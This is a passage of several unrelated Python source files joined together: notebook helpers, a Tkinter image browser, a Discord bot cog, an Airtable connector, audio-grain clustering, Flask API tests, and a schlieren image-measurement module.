return os.path.join(TOP(), path)
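# Example (paths are illustrative): if `git rev-parse --show-toplevel` reports
# /home/user/course-repo, then P("assignments", "hw1") returns
# "/home/user/course-repo/assignments/hw1".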
def flush_inline_matplotlib_plots():
"""
Flush matplotlib plots immediately, rather than asynchronously.
Basically, the inline backend only shows the plot after the entire
cell executes, which means we can't easily use a contextmanager to
suppress displaying it. See https://github.com/jupyter-widgets/ipywidgets/issues/1181/
and https://github.com/ipython/ipython/issues/10376 for more details. This
    function flushes any pending matplotlib plots if we are using
the inline backend.
Stolen from https://github.com/jupyter-widgets/ipywidgets/blob/4cc15e66d5e9e69dac8fc20d1eb1d7db825d7aa2/ipywidgets/widgets/interaction.py#L35
"""
if "matplotlib" not in sys.modules:
# matplotlib hasn't been imported, nothing to do.
return
try:
import matplotlib as mpl
from ipykernel.pylab.backend_inline import flush_figures
except ImportError:
return
if mpl.get_backend() == "module://ipykernel.pylab.backend_inline":
flush_figures()
@contextmanager
def hide_outputs():
"""
Context manager for hiding outputs from display() calls.
    IPython handles matplotlib outputs specially, so those are suppressed too.
"""
ipy = get_ipython()
if ipy is None:
# Not running inside ipython!
yield
return
old_formatters = ipy.display_formatter.formatters
ipy.display_formatter.formatters = {}
try:
yield
finally:
ipy.display_formatter.formatters = old_formatters
@contextmanager
def chdir(path):
"""Change working directory to `path` and restore old path on exit.
`path` can be `None` in which case this is a no-op.
"""
if path is None:
yield
else:
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
|
"""
Solution to an exercise from
Think Python: An Introduction to Software Design
Allen B. Downey
This program requires Gui.py, which is part of
Swampy; you can download it from thinkpython.com/swampy.
This program started with a recipe by Noah Spurrier at
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/521918
"""
import os, sys
from Gui import *
import Image as PIL # to avoid name conflict with Tkinter
import ImageTk
class ImageBrowser(Gui):
"""An image browser that scans the files in a given directory and
displays any images that can be read by PIL.
"""
def __init__(self):
Gui.__init__(self)
# clicking on the image breaks out of mainloop
self.button = self.bu(command=self.quit, relief=FLAT)
def image_loop(self, dirname='.'):
"""loop through the files in (dirname), displaying
images and skipping files PIL can't read.
"""
files = os.listdir(dirname)
for file in files:
try:
self.show_image(file)
print file
self.mainloop()
except IOError:
continue
except:
break
def show_image(self, filename):
"""Use PIL to read the file and ImageTk to convert
to a PhotoImage, which Tk can display.
"""
image = PIL.open(filename)
self.tkpi = ImageTk.PhotoImage(image)
self.button.config(image=self.tkpi)
def main(script, dirname='.'):
g = ImageBrowser()
g.image_loop(dirname)
if __name__ == '__main__':
main(*sys.argv)
|
import random
import discord
import discord.ext.commands as commands
from .util import checks
SHIMMY_SERVER_ID = '140880261360517120'
NSFW_ROLE_ID = '261189004681019392'
eight_ball_responses = [
# Positive
"It is certain",
"It is decidedly so",
"Without a doubt",
"Yes, definitely",
"You may rely on it",
"As I see it, yes",
"Most likely",
"Outlook good",
"Yes",
"Signs point to yes",
    # Non-committal
"Reply hazy try again",
"Ask again later",
"Better not tell you now",
"Cannot predict now",
"Concentrate and ask again",
# Negative
"Don't count on it",
"My reply is no",
"My sources say no",
"Outlook not so good",
"Very doubtful"
]
def setup(bot):
bot.add_cog(Shimmy(bot))
class Shimmy:
"""Commands exclusive to Shimmy's discord server."""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True, no_pm=True)
@checks.in_server(SHIMMY_SERVER_ID)
async def nsfw(self, ctx):
"""Tries to add the NSFW role to a member."""
await self.bot.add_roles(ctx.message.author, discord.Object(id=NSFW_ROLE_ID))
await self.bot.say('\N{WHITE HEAVY CHECK MARK} Access granted.', delete_after=3)
await self.bot.delete_message(ctx.message)
@commands.command(aliases=['eight', '8'])
@checks.in_server(SHIMMY_SERVER_ID)
async def ball(self, *, question):
"""Scarecrow's 8-Ball reaches into the future, to find the answers to your questions.
It knows what will be, and is willing to share this with you. Just send a question that can be answered by
"Yes" or "No", then let Scarecrow's 8-Ball show you the way !
"""
await self.bot.say(random.choice(eight_ball_responses))
|
from tars_data_models.spendy.transaction import Transaction |
import os
from pyairtable import Table, Base, Api
from abc import ABC, abstractmethod
class DB_Connector(ABC):
@abstractmethod
def Get_Api(self):
pass
@abstractmethod
def Get_Base(self):
pass
@abstractmethod
def Get_Table(self, table_name: str):
pass
class PyAirtable_DB_Connector(DB_Connector):
def __init__(self):
self.api_key = os.environ['AIRTABLE_API_KEY']
self.base_id = os.environ['AIRTABLE_BASE_ID']
def Get_Api(self):
return Api(self.api_key)
def Get_Base(self):
return Base(self.api_key, self.base_id)
def Get_Table(self, table_name: str):
return Table(self.api_key, self.base_id, table_name)
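# Usage sketch (assumes AIRTABLE_API_KEY / AIRTABLE_BASE_ID are set in the
# environment and that a table with the given name exists in the base;
# "Transactions" is a placeholder name):
#   db = PyAirtable_DB_Connector()
#   table = db.Get_Table("Transactions")
#   records = table.all()   # pyairtable Table.all() fetches the rows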
# class DB_2(DB_operator):
# def __init__(self):
# self.api_key = os.environ['AIRTABLE_API_KEY']
# self.base_id = os.environ['AIRTABLE_BASE_ID']
# self.base = Base(self.api_key, self.base_id)
# def get_base(self):
# return self.base
# def get_table(self, table_name: str):
# self.table = Table(self.api_key, self.base_id, table_name)
# return self.table
# class UseDB():
# def usedb(db_operator: DB_operator):
# return db_operator.get_base()
# db1 = DB_1()
# db2 = DB_2()
# UseDB().usedb(db1) |
import numpy as np
import matplotlib.pyplot as plt
import argparse
from random import shuffle
from mpl_toolkits.mplot3d import Axes3D
from tqdm import *
from sklearn.cluster import KMeans
from sklearn.preprocessing import normalize
from pymongo import MongoClient
from scipy.spatial import distance
from sklearn.metrics import silhouette_score
from sklearn.decomposition import PCA
from pydub import AudioSegment
def main():
args = parseArgs()
numClusters = args.numClusters
estimator = KMeans(n_clusters=numClusters, n_jobs=-1, n_init=20, precompute_distances='auto')
print("Num Clusters: " + str(numClusters))
#Gather grains into numpy array
client = MongoClient()
db = client.audiograins
grainEntries = db.grains
query = grainEntries.find({})
dataIndex = 0
indexToFilename = [None] * query.count()
numXBins = args.numXBins
numBinergies = args.numBinergies
numLogBinergies = args.numLogBinergies
numMFCCs = args.numMFCCs
numRatios = args.numRatios
features=[]
if args.rolloff:
features.extend(["rolloff"])
if args.energy:
features.extend(["energy"])
if args.zcr:
features.extend(["zcr"])
if args.centroid:
features.extend(["centroid"])
if args.spread:
features.extend(["spread"])
if args.skewness:
features.extend(["skewness"])
if args.kurtosis:
features.extend(["kurtosis"])
nameFormat = "binergy%0" + str(len(str(numBinergies))) + "d"
for binNum in range(numBinergies):
features.append(nameFormat % binNum)
nameFormat = "xBin%0" + str(len(str(numXBins))) + "d"
for binNum in range(numXBins):
features.append(nameFormat % binNum)
nameFormat = "logbinergies%0" + str(len(str(numLogBinergies))) + "d"
for binNum in range(numLogBinergies):
features.append(nameFormat % binNum)
nameFormat = "hratio%02d"
for binNum in range(numRatios):
features.append(nameFormat % binNum)
nameFormat = "mfcc%02d"
for binNum in range(0,numMFCCs):
features.append(nameFormat % binNum)
numFeatures = len(features)
data = np.empty([query.count(), numFeatures])
dataIndex = 0
for grain in tqdm(query):
featureNum = 0
for feature in features:
data[dataIndex][featureNum] = grain[feature]
featureNum += 1
indexToFilename[dataIndex] = grain["file"]
dataIndex += 1
print("Data pulled")
## Fit data, label, and put files in buckets
print("Normalizing Data")
if np.any(np.isnan(data)):
print("Some data is NaN")
if not np.all(np.isfinite(data)):
print("Some data is infinite")
    data = normalize(data)
estimator.fit(data)
buckets = [None] * numClusters
dataIndex = 0
for label in estimator.labels_:
if buckets[label] is None:
buckets[label] = []
buckets[label].append(indexToFilename[dataIndex])
dataIndex += 1
bucketIndex = 0
for bucket in buckets:
song = None
shuffle(bucket)
print("Writing sound file for bucket " + str(bucketIndex) + " With " + str(len(bucket)) + "samples")
for grainFile in tqdm(bucket):
grain = AudioSegment.from_wav(grainFile)
if song is None:
song = grain
else:
song = song.append(grain, crossfade=10)
song.export("soundGroups/grouping" + str(bucketIndex) + ".wav", format="wav")
bucketIndex += 1
print("Silhouette score:" + str(silhouette_score(data, estimator.labels_, metric='euclidean')))
def parseArgs():
parser = argparse.ArgumentParser(description='Cluster grains based on values computed using an analyzer whose results are available in a mongo database')
parser.add_argument('-numClusters', '--numClusters', nargs='?', default=10, type=int)
parser.add_argument('-numXBins', '--numXBins', nargs='?', default=0, type=int)
parser.add_argument('-numBinergies', '--numBinergies', nargs='?', default=0, type=int)
parser.add_argument('-numLogBinergies', '--numLogBinergies', nargs='?', default=0, type=int)
parser.add_argument('-numMFCCs', '--numMFCCs', nargs='?', default=0, type=int)
parser.add_argument('-numRatios', '--numRatios', nargs='?', default=0, type=int)
parser.add_argument('--rolloff', dest='rolloff', action='store_true', help='use spectral rolloff in clustering')
parser.add_argument('--energy', dest='energy', action='store_true', help='use signal energy in clustering')
parser.add_argument('--zcr', dest='zcr', action='store_true', help='use signal zero crossing rate in clustering')
parser.add_argument('--centroid', dest='centroid', action='store_true', help='use the spectral centroid in clustering')
parser.add_argument('--spread', dest='spread', action='store_true', help='use the spectral spread in clustering')
parser.add_argument('--skewness', dest='skewness', action='store_true', help='use the spectral skewness in clustering')
parser.add_argument('--kurtosis', dest='kurtosis', action='store_true', help='use the spectral kurtosis in clustering')
#Arg defaults
parser.set_defaults(rolloff=False)
parser.set_defaults(energy=False)
parser.set_defaults(zcr=False)
parser.set_defaults(centroid=False)
parser.set_defaults(spread=False)
parser.set_defaults(skewness=False)
parser.set_defaults(kurtosis=False)
return parser.parse_args()
if __name__ == "__main__":
main()
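# Example invocation (the script file name is assumed; the flags map directly
# to parseArgs above):
#   python cluster_grains.py -numClusters 12 -numMFCCs 13 --centroid --rolloff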
|
from flask import url_for
def test_hostgroups(client, access_token):
token = access_token
res = client.get(url_for('hostgroups'), headers={'authorization': "Bearer {token}".format(token=token)})
assert res.status_code == 200
assert res.json[0]['id'] == 1
assert res.json[0]['name'] == "default"
assert res.json[0]['comment'] == "created by sshportal"
assert 'acls' in res.json[0]
assert 'hosts' in res.json[0]
assert res.json[0]['acls'][0]['id'] == 1
assert res.json[0]['acls'][0]['comment'] == "created by sshportal"
def test_hostgroup_id(client, access_token):
token = access_token
res = client.get(url_for('hostgroupid', id=1), headers={'authorization': "Bearer {token}".format(token=token)})
assert res.status_code == 200
assert res.json['id'] == 1
assert res.json['name'] == "default"
assert res.json['comment'] == "created by sshportal"
assert 'acls' in res.json
assert 'hosts' in res.json
assert res.json['acls'][0]['id'] == 1
assert res.json['acls'][0]['comment'] == "created by sshportal"
def test_hostgroup_name(client, access_token):
token = access_token
res = client.get(url_for(
'hostgroupname', name="default"),
headers={'authorization': "Bearer {token}".format(token=token)}
)
assert res.status_code == 200
assert res.json['id'] == 1
assert res.json['name'] == "default"
assert res.json['comment'] == "created by sshportal"
assert 'acls' in res.json
assert 'hosts' in res.json
assert res.json['acls'][0]['id'] == 1
assert res.json['acls'][0]['comment'] == "created by sshportal"
|
'''
Configures logger
'''
import logging
import os
# Delete previous debug log
if os.path.exists("debug.log"):
os.remove("debug.log")
# Initialize logger
FORMAT = '[%(levelname)s] - %(asctime)s: %(message)s'
logging.basicConfig(handlers=[logging.FileHandler(filename='debug.log', encoding='utf-8', mode='a+')],
level=logging.INFO,
format=FORMAT,
datefmt='%H:%M:%S')
logging.info("----------------Start-----------------")
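# With the FORMAT and datefmt above, entries in debug.log look like
# (timestamp illustrative):
#   [INFO] - 14:03:07: ----------------Start-----------------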
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import matplotlib.pyplot as plt
# RiBuild Modules
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import validation as auth_dict
from delphin_6_automation.backend import result_extraction
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
server = mongo_setup.global_init(auth_dict)
filters_none = {}
filters = {'exterior_climate': 'MuenchenAirp',}
filters2 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250]}
filters3 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250], 'wall_core_thickness': 48}
filters4 = {'exterior_climate': 'MuenchenAirp', 'wall_orientation': [200, 250], 'system_name': 'Calsitherm'}
filters5 = {'exterior_climate': 'MuenchenAirp', 'rain_scale_factor': [0.0, 0.15]}
projects = result_extraction.filter_db(filters_none)
def lookup(projects_):
ori = []
rain = []
for p in projects_:
ori.append(p.sample_data['wall_orientation'])
rain.append(p.sample_data['rain_scale_factor'])
ori = set(ori)
rain = set(rain)
print(f'Orientations: {sorted(ori)}')
print(f'Rain: {sorted(rain)}')
#lookup(projects)
x, y = result_extraction.compute_cdf(projects, 'heat_loss')
#a = np.nonzero(x < 2.0)
#print(y[a][-1])
plt.figure()
plt.plot(x, y)
plt.show()
mongo_setup.global_end_ssh(server)
|
import os
import warnings
import numpy as np
import pandas as pd
import uncertainties as un
import uncertainties.unumpy as unp
from matplotlib import pyplot as plt
from matplotlib import widgets
from skimage import io
from skimage.filters import sobel_v
from ...dir import d_drive, convert_dir_to_local
from ...uncertainty import add_uncertainty_terms, u_cell
u_cell = u_cell["schlieren"]
def get_spatial_dir(
date,
base_dir=os.path.join(
d_drive,
"Data",
"Raw"
)
):
_dir_date = os.path.join(
base_dir,
date
)
contents = os.listdir(_dir_date)
if ".old" in contents:
_dir_spatial = os.path.join(
base_dir,
date,
"Camera",
"spatial"
)
else:
_dir_spatial = os.path.join(
base_dir,
date,
"spatial"
)
if not os.path.exists(_dir_spatial):
warnings.warn("directory not found: %s" % _dir_spatial)
_dir_spatial = np.NaN
return _dir_spatial
def get_varied_spatial_dir(
spatial_date_dir,
spatial_dir_name,
base_dir=os.path.join(
d_drive,
"Data",
"Raw"
)
):
"""
Some days got weird due to overnight testing, which means that tests on
those days may have a weird spatial calibration image location.
Parameters
----------
    spatial_date_dir : str
        Name of the date directory under `base_dir` that holds the spatial
        calibration images for the tests in question
    spatial_dir_name : str
        Name of the spatial calibration directory within the date directory
    base_dir : str
        Base directory containing the raw data directories
    Returns
    -------
    str or float
        Path to the spatial calibration directory, or NaN if the directory
        does not exist
    """
_dir_date = os.path.join(
base_dir,
spatial_date_dir,
spatial_dir_name,
)
if not os.path.exists(_dir_date):
warnings.warn("directory not found: %s" % _dir_date)
_dir_date = np.NaN
return _dir_date
def get_spatial_loc(
date,
which="near",
base_dir=os.path.join(
d_drive,
"Data",
"Raw"
)
):
_dir_date = get_spatial_dir(
date,
base_dir
)
_near = "near.tif"
_far = "far.tif"
if which == "near":
return os.path.join(_dir_date, _near)
elif which == "far":
return os.path.join(_dir_date, _far)
elif which == "both":
return [os.path.join(_dir_date, _near), os.path.join(_dir_date, _far)]
else:
raise ValueError("bad value of `which`")
def find_images_in_dir(
directory,
data_type=".tif"
):
"""
Finds all files in a directory of the given file type. This function should
be applied to either a `bg` or `frames` directory from a single day of
testing.
Parameters
----------
directory : str
Directory to search
data_type : str
File type to search for
Returns
-------
List[str]
"""
last_n = -len(data_type)
return sorted([
os.path.join(directory, f)
for f in os.listdir(directory)
if f[last_n:] == data_type
])
def find_shot_images(
dir_shot,
data_type=".tif"
):
"""
Collects all background and frame images for a single shot directory. Shot
directory should contain `bg` and `frames` sub-directories.
Parameters
----------
dir_shot : str
Shot directory to collect images from
data_type : str
File type of schlieren images
Returns
-------
list
[[background image paths], [frame image paths]]
"""
backgrounds = []
frames = []
for root, _, files in os.walk(dir_shot):
curdir = os.path.split(root)[1]
if curdir == "bg":
backgrounds = find_images_in_dir(root, data_type=data_type)
elif curdir == "frames":
frames = find_images_in_dir(root, data_type=data_type)
return [backgrounds, frames]
def average_frames(frame_paths):
"""
Averages all frames contained within a list of paths
Parameters
----------
frame_paths : list
Path to image frames to average
Returns
-------
np.array
Average image as a numpy array of float64 values
"""
return np.array(
[io.imread(frame) for frame in frame_paths],
dtype='float64'
).mean(axis=0)
def bg_subtract_all_frames(dir_raw_shot):
"""
Subtract the averaged background from all frames of schlieren data in a
given shot.
Parameters
----------
dir_raw_shot : str
Directory containing raw shot data output. Should have `bg` and
`frames` sub-directories.
Returns
-------
list
List of background subtracted arrays
"""
pth_list_bg, pth_list_frames = find_shot_images(dir_raw_shot)
bg = average_frames(pth_list_bg)
return [(io.imread(frame) - bg + 2**15) for frame in pth_list_frames]
def _maximize_window():
# https://stackoverflow.com/questions/12439588/how-to-maximize-a-plt-show-window-using-python
plt_backend = plt.get_backend()
mng = plt.get_current_fig_manager()
if "Qt" in plt_backend:
mng.window.showMaximized()
return True
elif "wx" in plt_backend:
mng.frame.Maximize(True)
return True
elif "Tk" in plt_backend:
mng.window_state('zoomed')
return True
else:
print("figure out how to maximize for ", plt_backend)
return False
def collect_spatial_calibration(
spatial_file,
line_color="r",
marker_length_mm=5.08,
px_only=False,
apply_uncertainty=True,
plot_window=None,
msg_box=None
): # pragma: no cover
image = io.imread(spatial_file)
if plot_window is not None:
# called from Qt gui
ax = plot_window.ax
fig = plot_window.fig
else:
# not called form Qt gui
fig, ax = plt.subplots(1, 1)
fig.canvas.manager.window.move(0, 0)
ax.axis("off")
ax.imshow(image)
cal_line = widgets.Line2D(
[0, 100],
[0, 100],
c=line_color
)
ax.add_line(cal_line)
# noinspection PyTypeChecker
linebuilder = LineBuilder(cal_line)
if plot_window is not None:
# called from Qt gui
plot_window.imshow(image)
plot_window.exec_()
if msg_box is None:
# noinspection SpellCheckingInspection
raise ValueError("Lazy dev didn't error handle this! Aaahh!")
num_boxes = msg_box().num_boxes
else:
# not called from Qt gui
_maximize_window()
plt.tight_layout()
plt.show(block=True)
while True:
try:
num_boxes = float(input("number of markers: "))
break
except ValueError:
pass
# I built the input to this in a bad way. The nominal value is the size of
# an engineering paper box, and the std_dev is the resolution error of a
# single line. The error should be applied at either end of the calibration
# line, i.e. the error should be the same regardless of line length. To
# make this happen, I am breaking out the components and applying them as
# originally intended.
line_length_mm = num_boxes * marker_length_mm
if apply_uncertainty:
line_length_mm = un.ufloat(
line_length_mm,
add_uncertainty_terms([
u_cell["l_mm"]["b"],
u_cell["l_mm"]["p"]
])
)
if px_only:
return _get_cal_delta_px(linebuilder.xs, linebuilder.ys)
else:
mm_per_px = _calibrate(
linebuilder.xs,
linebuilder.ys,
line_length_mm,
apply_uncertainty=apply_uncertainty
)
return mm_per_px
def measure_single_frame(
image_array,
lc="r"
):
m = MeasurementCollector(image_array, lc=lc)
_maximize_window()
data = m.get_data()
del m
return data
def _get_cal_delta_px(
x_data,
y_data
):
return np.sqrt(
np.square(np.diff(x_data)) +
np.square(np.diff(y_data))
)
def _calibrate(
x_data,
y_data,
line_length_mm,
apply_uncertainty=True
):
"""
Calculates a calibration factor to convert pixels to mm by dividing
the known line length in mm by the L2 norm between two pixels.
Parameters
----------
x_data : iterable
X locations of two points
y_data : iterable
Y locations of two points
line_length_mm : float
Length, in mm, of the line between (x0, y0), (x1, y1)
apply_uncertainty : bool
Applies pixel uncertainty if True
Returns
-------
float or un.ufloat
Pixel linear pitch in mm/px
"""
line_length_px = _get_cal_delta_px(x_data, y_data)
if apply_uncertainty:
line_length_px = un.ufloat(
line_length_px,
add_uncertainty_terms([
u_cell["l_px"]["b"],
u_cell["l_px"]["p"]
])
)
return line_length_mm / line_length_px
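# Worked example (numbers are illustrative): for endpoints (0, 0) and (200, 0)
# px with line_length_mm = 50.8, the L2 norm between the points is 200 px, so
# the calibration factor is 50.8 / 200 = 0.254 mm/px (returned as a ufloat
# when apply_uncertainty is True).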
class LineBuilder(object): # pragma: no cover
# I'm not sure how to automate tests on this, it works right now, and I
# don't have time to figure out how, so I'm going to skip it for now.
# modified version of code from
# https://stackoverflow.com/questions/34855074/interactive-line-in-matplotlib
def __init__(self, line, epsilon=10):
canvas = line.figure.canvas
line.set_alpha(0.7)
self.canvas = canvas
self.canvas.mpl_connect("key_press_event", self._button)
self.line = line
self.axes = line.axes
self.xs = list(line.get_xdata())
self.ys = list(line.get_ydata())
self.background = None
self.epsilon = epsilon
self.circles = [
widgets.Circle(
(self.xs[i], self.ys[i]),
epsilon,
color=line.get_c(),
lw=line.get_linewidth(),
fill=False,
alpha=0.25
)
for i in range(len(self.xs))
]
for c in self.circles:
self.axes.add_artist(c)
self._end_line_length = 2 * np.sqrt(
sum([
np.diff(self.axes.get_xlim())**2,
np.diff(self.axes.get_ylim())**2
])
)
self._end_lines = [
widgets.Line2D(
[0, 1],
[0, 1],
c=line.get_c(),
lw=line.get_linewidth(),
alpha=0.5*line.get_alpha()
)
for _ in self.xs
]
self.set_end_lines()
for _line in self._end_lines:
self.axes.add_artist(_line)
self.items = (self.line, *self.circles, *self._end_lines)
self.ind = None
canvas.mpl_connect('button_press_event', self.button_press_callback)
canvas.mpl_connect('button_release_event', self.button_release_callback)
canvas.mpl_connect('motion_notify_event', self.motion_notify_callback)
def _button(self, event):
if event.key == "enter":
plt.close(self.line.figure)
def get_ind(self, event):
if event.inaxes is not None:
x = np.array(self.line.get_xdata())
y = np.array(self.line.get_ydata())
d = np.sqrt((x-event.xdata)**2 + (y - event.ydata)**2)
if min(d) > self.epsilon:
return None
return int(d[0] > d[1])
def button_press_callback(self, event):
if event.button == 2:
# middle click
plt.close(self.axes.get_figure())
elif event.button != 1:
return
self.ind = self.get_ind(event)
for item in self.items:
item.set_animated(True)
self.canvas.draw()
self.background = self.canvas.copy_from_bbox(self.line.axes.bbox)
for item in self.items:
self.axes.draw_artist(item)
self.canvas.blit(self.axes.bbox)
def button_release_callback(self, event):
if event.button != 1:
return
self.ind = None
for item in self.items:
item.set_animated(False)
self.background = None
for item in self.items:
item.figure.canvas.draw()
def motion_notify_callback(self, event):
if event.inaxes != self.line.axes:
return
if event.button != 1:
return
if self.ind is None:
return
self.xs[self.ind] = event.xdata
self.ys[self.ind] = event.ydata
self.line.set_data(self.xs, self.ys)
self.set_end_lines()
for c, x, y in zip(self.circles, self.xs, self.ys):
# noinspection PyArgumentList
c.set_center((x, y))
self.canvas.restore_region(self.background)
for item in self.items:
self.axes.draw_artist(item)
self.canvas.blit(self.axes.bbox)
def get_line_angle(self):
if np.diff(self.xs) == 0:
return np.pi
else:
return np.arctan(np.diff(self.ys) / np.diff(self.xs))[0]
def calculate_end_line_xy(self):
angle = (self.get_line_angle() + np.pi / 2) % (2 * np.pi)
dx = self._end_line_length / 2 * np.sqrt(1 / (1 + np.tan(angle)**2))
dy = dx * np.tan(angle)
x_points = [list(x + np.array([1, -1]) * dx) for x in self.xs]
y_points = [list(y + np.array([1, -1]) * dy) for y in self.ys]
return [x_points, y_points]
def set_end_lines(self):
end_line_points = self.calculate_end_line_xy()
for _line, x, y in zip(self._end_lines, *end_line_points):
_line.set_data(x, y)
class MeasurementCollector(object): # pragma: no cover
# also skipping tests for the same reason as LineBuilder
class RemoveLine:
button = 3
class CloseIt:
button = 2
def __init__(self, image, lc="r"):
self.locs = []
self.cmap = "gray"
fig, [ax, ax2] = plt.subplots(2, 1)
self.lines = []
self.fig = fig
plt.get_current_fig_manager().window.setGeometry(0, 0, 640, 480)
self.ax = ax
self.lc = lc
# remove_annotations(ax)
ax.set_axis_off()
ax.set_position([0, 0.07, 1, 0.9])
ax2.set_position([0.375, 0.01, 0.25, 0.05])
# plt.axis("off")
# plt.axis("tight")
self._help = False
self._title_default = "press 'h' for help"
self._title_help = \
"HELP MENU\n\n"\
"press 'r' to invert colors\n"\
"press left mouse to identify a triple point\n"\
"press right mouse to delete last measurement\n"\
"press 'enter' or center mouse to end measurements\n"\
"click and drag horizontally to adjust contrast to red area\n"\
"click 'Reset Contrast' button to reset contrast\n"\
"press 'h' to hide this dialog"
self._set_title(self._title_default)
canvas = ax.figure.canvas
canvas.mpl_connect("key_press_event", self._button)
canvas.mpl_connect('button_release_event', self.button_press_callback)
self.image = self._sharpen(image)
self.rect_select = widgets.SpanSelector(
self.ax,
self.slider_select,
"horizontal"
)
# noinspection PyTypeChecker
# ax2 = plt.axes((0.375, 0.025, 0.25, 0.04))
# fig.add_axes(ax2)
self.btn_reset = widgets.Button(
ax2,
"Reset Contrast"
)
self.btn_reset.on_clicked(self.reset_vlim)
self.ax.imshow(self.image, cmap=self.cmap)
self.fig.canvas.draw()
@staticmethod
def _sharpen(image):
image /= image.max()
filtered = 1 - sobel_v(image)
filtered /= filtered.max()
return filtered * image
def _button(self, event):
if event.key == "enter":
self.button_press_callback(self.CloseIt)
elif event.key == "r":
if self.cmap == "gray":
self.cmap = "gist_gray_r"
else:
self.cmap = "gray"
self.ax.images[0].set_cmap(self.cmap)
self.fig.canvas.draw()
elif event.key == "h":
if self._help:
self._set_title(self._title_help, True)
else:
self._set_title(self._title_default)
self._help = not self._help
self.fig.canvas.draw()
def _set_title(self, string, have_background=False):
if have_background:
bg_color = (1, 1, 1, 0.75)
h_align = "left"
else:
bg_color = (0, 0, 0, 0)
h_align = "right"
t = self.fig.suptitle(
string,
size=10,
y=0.99,
ma=h_align,
)
t.set_backgroundcolor(bg_color)
self.fig.canvas.draw()
def slider_select(self, x_min, x_max):
px_distance = abs(x_max - x_min)
if px_distance <= 1:
# this should have been a click
pass
else:
# this was meant to be a drag
x_min, x_max = int(x_min), int(x_max)
img_in_range = self.image[:, x_min:x_max]
self.ax.images[0].norm.vmin = np.min(img_in_range)
self.ax.images[0].norm.vmax = np.max(img_in_range)
self.fig.canvas.draw()
self.button_press_callback(self.RemoveLine)
def reset_vlim(self, _):
self.ax.images[0].norm.vmin = np.min(self.image)
self.ax.images[0].norm.vmax = np.max(self.image)
self.button_press_callback(self.RemoveLine)
self.fig.canvas.draw()
def button_press_callback(self, event):
if event.button == 1:
# left click
if any([d is None for d in [event.xdata, event.ydata]]):
# ignore clicks outside of image
pass
else:
self.lines.append(self.ax.axhline(event.ydata, color=self.lc))
self.locs.append(event.ydata)
self.fig.canvas.draw()
elif event.button == 2:
# middle click
plt.close()
elif event.button == 3:
# right click
if self.lines:
# noinspection PyProtectedMember
self.lines[-1]._visible = False
del self.lines[-1], self.locs[-1]
self.fig.canvas.draw()
def get_data(self):
plt.show(block=True)
points = unp.uarray(
sorted(np.array(self.locs)),
add_uncertainty_terms([
u_cell["delta_px"]["b"],
u_cell["delta_px"]["p"]
])
)
return points
def get_cell_size_from_delta(
delta,
l_px_i,
l_mm_i
):
"""
Converts pixel triple point deltas to cell size
Parameters
----------
    delta : un.ufloat
        measured pixel distance between adjacent triple point paths (px)
l_px_i : float
nominal value of spatial calibration factor (px)
l_mm_i : float
nominal value of spatial calibration factor (mm)
Returns
-------
un.ufloat
estimated cell size
"""
l_px_i = un.ufloat(
l_px_i,
add_uncertainty_terms([
u_cell["l_px"]["b"],
u_cell["l_px"]["p"]
])
)
l_mm_i = un.ufloat(
l_mm_i,
add_uncertainty_terms([
u_cell["l_mm"]["b"],
u_cell["l_mm"]["p"]
])
)
return 2 * delta * l_mm_i / l_px_i
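# A minimal usage sketch (added for illustration; the numbers below are
# hypothetical and not taken from any measurement in this project).
def _example_get_cell_size_from_delta():  # pragma: no cover
    # A triple-point delta of 100 +/- 2 px with a calibration of 1000 px per
    # 300 mm gives roughly 2 * 100 * 300 / 1000 = 60 mm, with the calibration
    # uncertainty terms propagated through the ufloat arithmetic.
    delta = un.ufloat(100., 2.)
    return get_cell_size_from_delta(delta, l_px_i=1000., l_mm_i=300.)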
def _filter_df_day_shot(
df,
day_shot_list,
return_mask=False
):
"""
    Filters a dataframe by date and shot number for an arbitrary number of
    date/shot combinations. Returns the filtered dataframe and, optionally,
    the boolean mask used to build it.
Parameters
----------
df : pd.DataFrame
dataframe to filter. Must have columns for "date" and "shot".
    day_shot_list : List[Tuple[str, int, int]]
        List of tuples containing date, start shot, and end shot. Date should
        be a string in ISO-8601 format, and the start/end shot numbers should
        be integers:
[("YYYY-MM-DD", start_shot, end_shot)]
return_mask : bool
if true, mask will be returned as the second item, which can be used to
update data (e.g. inserting a spatial calibration)
Returns
-------
Union[Tuple[pd.DataFrame, np.array], Tuple[pd.DataFrame]]
(filtered dataframe,) or (filtered dataframe, mask)
"""
mask_list = [((df["date"] == date) &
(df["shot"] <= end_shot) &
(df["shot"] >= start_shot))
for (date, start_shot, end_shot) in day_shot_list]
mask = [False for _ in range(len(df))]
for m in mask_list:
mask = m | mask
if return_mask:
return df[mask], mask
else:
return df[mask],
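# Illustrative sketch (added; the dates and shot numbers are hypothetical, not
# data from this project): keep shots 1-3 from one day plus shot 0 from the
# next, and reuse the returned mask for a later write-back.
def _example_filter_df_day_shot():  # pragma: no cover
    df = pd.DataFrame({
        "date": ["2020-01-01"] * 5 + ["2020-01-02"] * 5,
        "shot": list(range(5)) * 2,
    })
    filtered, mask = _filter_df_day_shot(
        df,
        [("2020-01-01", 1, 3), ("2020-01-02", 0, 0)],
        return_mask=True,
    )
    return filtered, mask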
def _check_stored_calibrations(
df
):
"""
Check for stored calibrations within a filtered dataframe. All rows are
checked for:
* whether there are any stored spatial calibrations
* whether there are stored calibrations for every date and shot
* whether all of the stored calibrations are equal
This function is meant to be applied to a schlieren dataframe, which must
contain the columns:
* spatial_near
* spatial_far
* spatial_centerline
Parameters
----------
df : pd.DataFrame
filtered dataframe containing only the date/shot combinations of
interest
Returns
-------
    Dict[str, Dict[str, bool]]
Outer keys:
* near
* far
* centerline
Inner keys:
* any
* all
* equal
"""
out = dict(
near=dict(
any=False,
all=False,
equal=False,
),
far=dict(
any=False,
all=False,
equal=False,
),
centerline=dict(
any=False,
all=False,
equal=False,
),
)
for location in out.keys():
values = df["spatial_" + location].values.astype(float)
not_nan = ~np.isnan(values)
out[location]["any"] = np.any(not_nan)
out[location]["all"] = np.all(not_nan)
if len(values[not_nan]) == 0:
# everything is NaN
out[location]["equal"] = True
else:
